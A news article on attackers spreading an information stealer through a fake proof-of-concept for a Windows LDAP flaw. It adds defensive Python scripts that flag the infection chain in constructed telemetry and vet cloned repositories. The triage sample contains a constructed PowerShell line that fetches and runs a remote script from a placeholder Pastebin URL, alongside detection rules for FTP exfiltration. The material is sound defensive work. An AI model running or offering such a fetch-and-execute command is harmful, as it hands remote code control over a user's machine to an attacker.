Security researchers have been put on high alert after threat actors developed a fake proof-of-concept (PoC) exploit for a critical Microsoft vulnerability in an attempt to distribute information-stealing malware, according to a report by Trend Micro.
The vulnerability in question is related to Microsoft’s Windows Lightweight Directory Access Protocol (LDAP), for which a patch was released in December 2024 as part of the tech giant’s Patch Tuesday update. Known as CVE-2024-49113, the vulnerability allows for a denial-of-service (DoS) attack that can disrupt the LDAP service, causing service outages.
In a crafty move, the attackers created a deceptive repository housing the fake PoC exploit. When security researchers unknowingly download and execute this exploit, it triggers the exfiltration of sensitive computer and network information. This stolen data includes details such as computer information, process list, directory lists, network IPs, network adapters, and installed updates.
PoC exploits are commonly used in the cybersecurity research community to uncover software vulnerabilities and potential threats, enabling proactive measures to be taken to mitigate these risks. Despite the familiar tactic of using PoC lures as a means of malware distribution, Trend Micro emphasized the severity of this particular attack due to its exploitation of a trending issue that could impact a large number of victims.
The PoC lure works by planting a malicious repository that impersonates the original creator and serves as the gateway to the malware. The legitimate Python files are replaced with an executable, poc.exe, packed with UPX. When the file is run, it drops a PowerShell script into the %Temp% folder and executes it, which creates a Scheduled Job that runs an encoded script.
Once decoded, that script fetches another script from Pastebin, which collects the victim’s public IP address and uploads it over FTP. It then gathers computer and network data, compresses it into a ZIP file, and sends it to an external FTP server using hardcoded credentials.
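The chain described above leaves a recognisable trail on the endpoint: a script dropped into %Temp% by a non-PowerShell process, PowerShell launched with an encoded command that registers a scheduled job, a fetch from Pastebin, and an outbound FTP connection from PowerShell. The following is an added example (not code from Trend Micro or from the lure) that runs those behavioural checks over a handful of constructed Sysmon-style records; the file paths, the 203.0.113.10 address and the Pastebin URL are made-up placeholders, and the encoded command is built inline so the decoder can be exercised offline.

```python
"""Triage constructed endpoint telemetry for the fake-PoC infection chain.

Added example; all sample records, paths and hosts are constructed."""
import base64
import re

# Sysmon-like event ids: 1 = process create, 3 = network connect, 11 = file create.
_POC = r"C:\Users\analyst\Downloads\LDAPNightmare-PoC\poc.exe"        # constructed path
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed stand-in for the lure's encoded script (the Pastebin URL is a placeholder).
_ENCODED = encode_ps(
    "Register-ScheduledJob -Name Update -ScriptBlock { "
    "iwr https://pastebin.com/raw/PLACEHOLDER | iex }"
)

SAMPLE_EVENTS = [  # constructed telemetry, not real data
    {"id": 1, "image": _POC, "parent": r"C:\Windows\explorer.exe", "cmdline": "poc.exe"},
    {"id": 11, "image": _POC, "target": r"C:\Users\analyst\AppData\Local\Temp\update.ps1"},
    {"id": 1, "image": _PS, "parent": _POC,
     "cmdline": f"powershell.exe -NoProfile -EncodedCommand {_ENCODED}"},
    {"id": 3, "image": _PS, "dest_host": "pastebin.com", "dest_port": 443},
    {"id": 3, "image": _PS, "dest_host": "203.0.113.10", "dest_port": 21},
]

# Accepts -e, -enc and -EncodedCommand (PowerShell allows abbreviated switches).
_ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded script from a -EncodedCommand argument, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _is_temp(path: str) -> bool:
    return "\\appdata\\local\\temp\\" in path.lower()


def _is_powershell(path: str) -> bool:
    return path.lower().endswith(("powershell.exe", "pwsh.exe"))


def triage(events):
    """Apply the chain's behavioural indicators; return a list of (rule, detail)."""
    findings = []
    for ev in events:
        if ev["id"] == 11 and _is_temp(ev["target"]) \
                and ev["target"].lower().endswith(".ps1") and not _is_powershell(ev["image"]):
            findings.append(("ps1_dropped_in_temp", ev["target"]))
        elif ev["id"] == 1 and _is_powershell(ev["image"]):
            script = decode_encoded_command(ev.get("cmdline", ""))
            if script is None:
                continue
            findings.append(("encoded_powershell", ev["parent"]))
            low = script.lower()
            if "register-scheduledjob" in low or "schtasks" in low:
                findings.append(("scheduled_job_from_encoded", script.strip()))
            if "pastebin.com" in low:
                findings.append(("pastebin_in_script", script.strip()))
        elif ev["id"] == 3 and _is_powershell(ev["image"]):
            if ev.get("dest_host", "").endswith("pastebin.com"):
                findings.append(("pastebin_fetch", ev["dest_host"]))
            if ev.get("dest_port") == 21:  # plain FTP, as used for the ZIP upload
                findings.append(("ftp_from_powershell", ev["dest_host"]))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:28s} {detail}")
```

Each rule on its own is noisy (encoded PowerShell and scheduled jobs have legitimate uses); the value is in seeing several of them fire from one parent process within a short window, which is how a detection engineer would turn these checks into a correlated alert.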
To combat such deceptive tactics, security researchers are advised to exercise caution and adopt best practices. Trend Micro outlined several key recommendations for researchers to follow, including downloading code from official and trusted sources, scrutinizing repositories for suspicious content, verifying the repository owner’s identity, monitoring commit histories for anomalies, and being wary of repositories with minimal activity or engagement.
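Several of those recommendations can be checked mechanically before anything from a cloned repository is run. The script below is an added example (not Trend Micro's tooling) that walks a local checkout and flags what the lure relied on: prebuilt binaries in a repository that is supposed to be Python source, PE executables regardless of extension, and the UPX section names and "UPX!" signature that a UPX-packed file carries. Commit-history and owner checks are left to git and the hosting platform. The sample repository it vets is constructed in a temporary directory inside the script.

```python
"""Vet a local repository checkout for prebuilt or packed executables.

Added example; the sample repository is constructed in a temp directory."""
import tempfile
from pathlib import Path

# Extensions a Python PoC repository has no reason to ship.
BINARY_SUFFIXES = {".exe", ".dll", ".scr", ".bat", ".cmd"}
# Section names and signature string present in UPX-packed executables.
UPX_MARKERS = (b"UPX!", b"UPX0", b"UPX1")


def inspect_file(path: Path) -> list:
    """Return the red flags raised by one file (empty list if none)."""
    flags = []
    if path.suffix.lower() in BINARY_SUFFIXES:
        flags.append("prebuilt_binary")
    head = path.read_bytes()[:1 << 20]          # first MiB is enough for headers
    if head[:2] == b"MZ":
        flags.append("pe_executable")           # catches renamed binaries too
    if any(marker in head for marker in UPX_MARKERS):
        flags.append("upx_packed")
    return flags


def vet_repo(root: Path) -> dict:
    """Walk a checkout; report flagged files and an overall verdict."""
    report = {"files": {}, "has_python_source": False}
    for p in root.rglob("*"):
        if not p.is_file() or ".git" in p.parts:
            continue
        if p.suffix.lower() == ".py":
            report["has_python_source"] = True
        flags = inspect_file(p)
        if flags:
            report["files"][str(p.relative_to(root)).replace("\\", "/")] = flags
    if report["files"] and not report["has_python_source"]:
        report["verdict"] = "suspicious"   # binaries where source was expected
    elif report["files"]:
        report["verdict"] = "review"
    else:
        report["verdict"] = "clean"
    return report


def build_sample_repo(root: Path) -> None:
    """Construct a checkout shaped like the lure: README plus a packed poc.exe."""
    (root / "README.md").write_text("# PoC for CVE-2024-49113\n")
    # Constructed stand-in for a UPX-packed PE: MZ stub followed by UPX markers.
    fake_exe = b"MZ" + b"\x00" * 62 + b"UPX0\x00UPX1\x00UPX!" + b"\x00" * 16
    (root / "poc.exe").write_bytes(fake_exe)


def build_clean_repo(root: Path) -> None:
    """Construct what the original checkout should look like: Python source only."""
    (root / "README.md").write_text("# PoC for CVE-2024-49113\n")
    (root / "poc.py").write_text("print('placeholder')\n")


def vet_sample(builder) -> dict:
    """Build a sample checkout with `builder` in a temp dir and vet it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        builder(root)
        return vet_repo(root)


if __name__ == "__main__":
    for name, builder in (("lure", build_sample_repo), ("expected", build_clean_repo)):
        print(name, vet_sample(builder))
```

The verdict is deliberately conservative: a repository that ships any binary alongside its source is marked for review rather than cleared, and the UPX check only recognises that one packer, so a clean result means "nothing obvious", not "safe to run".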
By remaining vigilant and adhering to these guidelines, security researchers can better protect themselves against the dangers posed by fake PoC lures and mitigate the risk of falling victim to malicious attacks.